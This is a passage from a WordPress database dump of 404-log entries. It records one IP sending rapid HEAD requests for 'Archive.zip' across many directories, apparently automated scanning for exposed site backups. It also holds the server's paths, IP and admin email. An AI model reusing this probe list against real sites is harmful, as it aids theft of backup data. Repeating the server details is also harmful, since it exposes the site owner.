\"1569606342\";}}','notice','2019-09-27 17:45:51','2019-09-27 17:45:43',35122256,36931656,'http://bintara.com.my/demo/Archive.zip',1,0,'182.50.132.111'),(27146,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/wordpress/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/wordpress/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/wordpress/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXKgAAAUE\";s:12:\"REDIRECT_URL\";s:22:\"/wordpress/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37470\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/wordpress/Archive.zip\";s:10:\"SCRIPT_URL\";s:22:\"/wordpress/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXKgAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606342.4975\";s:12:\"REQUEST_TIME\";s:10:\"1569606342\";}}','notice','2019-09-27 17:45:52','2019-09-27 17:45:43',35127232,36928000,'http://bintara.com.my/wordpress/Archive.zip',1,0,'182.50.132.111'),(27147,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/staging/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/staging/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/staging/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lowAAAQk\";s:12:\"REDIRECT_URL\";s:20:\"/staging/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37486\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/staging/Archive.zip\";s:10:\"SCRIPT_URL\";s:20:\"/staging/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lowAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606342.5101\";s:12:\"REQUEST_TIME\";s:10:\"1569606342\";}}','notice','2019-09-27 17:45:52','2019-09-27 17:45:43',35123968,36927608,'http://bintara.com.my/staging/Archive.zip',1,0,'182.50.132.111'),(27148,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/website/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/website/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/website/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpQAAARY\";s:12:\"REDIRECT_URL\";s:20:\"/website/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37476\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/website/Archive.zip\";s:10:\"SCRIPT_URL\";s:20:\"/website/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpQAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1569606342.5\";s:12:\"REQUEST_TIME\";s:10:\"1569606342\";}}','notice','2019-09-27 17:45:52','2019-09-27 17:45:43',35124392,36921432,'http://bintara.com.my/website/Archive.zip',1,0,'182.50.132.111'),(27149,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/portal/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/portal/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/portal/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lrQAAAQE\";s:12:\"REDIRECT_URL\";s:19:\"/portal/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37498\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/portal/Archive.zip\";s:10:\"SCRIPT_URL\";s:19:\"/portal/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lrQAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606342.5703\";s:12:\"REQUEST_TIME\";s:10:\"1569606342\";}}','notice','2019-09-27 17:45:52','2019-09-27 17:45:43',35126744,36942528,'http://bintara.com.my/portal/Archive.zip',1,0,'182.50.132.111'),(27150,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/v2/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/v2/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/v2/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqAAAAQA\";s:12:\"REDIRECT_URL\";s:15:\"/v2/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37484\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/v2/Archive.zip\";s:10:\"SCRIPT_URL\";s:15:\"/v2/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqAAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.2989\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:53','2019-09-27 17:45:46',35123488,36929760,'http://bintara.com.my/v2/Archive.zip',1,0,'182.50.132.111'),(27151,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blogs/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/blogs/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blogs/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXJwAAAUg\";s:12:\"REDIRECT_URL\";s:18:\"/blogs/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37482\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/blogs/Archive.zip\";s:10:\"SCRIPT_URL\";s:18:\"/blogs/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXJwAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569606344.314\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:54','2019-09-27 17:45:46',35128696,36936360,'http://bintara.com.my/blogs/Archive.zip',1,0,'182.50.132.111'),(27152,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/newsite/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/newsite/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/newsite/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpAAAARU\";s:12:\"REDIRECT_URL\";s:20:\"/newsite/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37456\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/newsite/Archive.zip\";s:10:\"SCRIPT_URL\";s:20:\"/newsite/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpAAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606342.4939\";s:12:\"REQUEST_TIME\";s:10:\"1569606342\";}}','notice','2019-09-27 17:45:54','2019-09-27 17:45:43',35124392,36921432,'http://bintara.com.my/newsite/Archive.zip',1,0,'182.50.132.111'),(27153,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/old/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/old/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/old/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpgAAAQs\";s:12:\"REDIRECT_URL\";s:16:\"/old/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37494\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/old/Archive.zip\";s:10:\"SCRIPT_URL\";s:16:\"/old/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpgAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.2904\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:54','2019-09-27 17:45:46',35125960,36924416,'http://bintara.com.my/old/Archive.zip',1,0,'182.50.132.111'),(27154,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/oldsite/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/oldsite/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/oldsite/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXJgAAAVI\";s:12:\"REDIRECT_URL\";s:20:\"/oldsite/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37474\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/oldsite/Archive.zip\";s:10:\"SCRIPT_URL\";s:20:\"/oldsite/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXJgAAAVI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.3096\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:54','2019-09-27 17:45:46',35125240,36928152,'http://bintara.com.my/oldsite/Archive.zip',1,0,'182.50.132.111'),(27155,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/new/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/new/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/new/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpwAAAQM\";s:12:\"REDIRECT_URL\";s:16:\"/new/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37478\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/new/Archive.zip\";s:10:\"SCRIPT_URL\";s:16:\"/new/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lpwAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.3393\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:55','2019-09-27 